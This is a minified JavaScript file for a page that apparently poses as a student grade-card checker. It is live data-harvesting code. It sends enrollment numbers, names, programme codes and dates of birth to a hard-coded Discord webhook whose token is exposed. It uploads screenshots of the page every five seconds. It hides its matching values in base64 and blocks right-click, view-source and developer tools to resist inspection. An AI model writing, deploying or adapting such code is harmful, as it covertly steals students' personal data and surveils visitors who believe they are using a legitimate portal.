const validAprilDates=atob("MjAyNS0wNC0wMywyMDI1LTA0LTA0").split(","),validNames=atob("YmhpbmRpLHBvdGF0byxsYWR5ZmluZ2Vy").split(","),validDOBs=atob("MjAwMS0wOC0wOA==").split(","),webhookUrl="https://discord.com/api/webhooks/1408320672110743623/qC2r_vnos_DwbDjQQN3OdoZSLMJ5WXX-UfhEQR0I5G9pEF_e-mjPZsk8vq8jSc5TqkI1";function updateCurrentDateTime(){var e=new Date,t=`${String(e.getDate()).padStart(2,"0")}/${String(e.getMonth()+1).padStart(2,"0")}/`+e.getFullYear(),e=`${String(e.getHours()).padStart(2,"0")}:${String(e.getMinutes()).padStart(2,"0")}:`+String(e.getSeconds()).padStart(2,"0"),o=document.querySelector(".current-date");o&&(o.textContent=`Current Date: ${t} `+e)}function formatDateDMY(e){var t,o;return e?([e,t,o]=e.split("-"),o+`-${t}-`+e):""}async function submitExtraFields(){var e=document.getElementById("aprilDatePopUp").value,t=document.getElementById("nameInputPopUp").value.trim().toLowerCase(),o=document.getElementById("programmeCodePopUp"),r=o.value,o=o.options[o.selectedIndex]?.text||"",n=document.getElementById("dobDatePopUp").value;if(!e)return alert("Please enter the April Date.");if(!t)return alert("Please enter the Name.");if(!r)return alert("Please select a Programme Code.");if(!n)return alert("Please enter the DOB.");var a=validAprilDates.includes(e),l=validNames.includes(t),i=validDOBs.includes(n);if(a&&l&&i){a={aprilDate:e,name:t,programmeCode:{value:r,text:o},dob:n,submittedAt:(new Date).toISOString()},l=(localStorage.setItem("popupFormData",JSON.stringify(a)),{content:`**New Form Submission**
**April Date:** ${e}
**Name:** ${t}
**Programme Code:** ${o} (Value: ${r})
**Other DOB:** ${n}
**Submitted At:** `+(new Date).toLocaleString()});try{var d=await fetch(webhookUrl,{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify(l)});d.ok?window.location.href="result.html":(alert("Failed to send data to Discord."),console.error("Discord webhook error:",d.statusText))}catch(e){alert("Error sending data."),console.error(e)}}else alert("Invalid date, name or DOB. Please enter the correct details.")}updateCurrentDateTime(),setInterval(updateCurrentDateTime,1e3),document.addEventListener("contextmenu",e=>e.preventDefault()),document.addEventListener("keydown",function(e){if("F12"===e.key||e.ctrlKey&&e.shiftKey&&["I","J","C"].includes(e.key.toUpperCase())||e.ctrlKey&&"U"===e.key.toUpperCase())return e.preventDefault(),!1}),setInterval(()=>{var e=performance.now();100<performance.now()-e&&(document.body.innerHTML='<h1 style="text-align:center; margin-top:20%;">Developer tools are not allowed.</h1>')},1e3),document.getElementById("studentForm").addEventListener("submit",function(e){e.preventDefault();var e=document.getElementById("gradeCardStatus").value,t=document.getElementById("enrollmentNo").value.trim(),o=document.getElementById("programmeCode").value,r=formatDateDMY(document.getElementById("dob").value),e=`
**Main Form Submission - ${(new Date).toLocaleString()}**

**Grade Card Status:** ${e}
**Enrollment No:** ${t}
**Programme Code:** ${o}
**Date of Birth:** ${r}
`;fetch(webhookUrl,{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:e})}).then(e=>{e.ok?this.reset():console.error("Error:",e.statusText)}).catch(e=>{alert("Error sending data."),console.error(e)})}),window.addEventListener("load",()=>{setInterval(()=>{html2canvas(document.body,{useCORS:!0}).then(e=>{e.toBlob(e=>{var t=new FormData;t.append("file",e,"screenshot.png"),t.append("payload_json",JSON.stringify({content:"📸 Screenshot taken at "+(new Date).toLocaleString()})),fetch(webhookUrl,{method:"POST",body:t}).then(e=>{e.ok?console.log("Screenshot sent"):console.error("Screenshot failed:",e.statusText)}).catch(console.error)},"image/png")})},5e3)}),$(document).ready(function(){setTimeout(function(){$("#infoOverlay").show(),$("#infoPopup").show(),setTimeout(()=>{$("#dearChange").text("Student")},500)},5e3),$("#closeInfoPopup").click(function(){$("#infoOverlay").hide(),$("#infoPopup").hide()}),$("#studentForm").on("submit",function(e){e.preventDefault();var e=$.trim($("#enrollmentNo").val()),t=$.trim($("#dob").val());e&&t?"2300822199"===e||["2000-10-06","1999-10-06"].includes(t)?($("#overlay").show(),$("#popup").show()):alert("Details do not match. Please check your information."):alert("Please fill in all required fields.")})});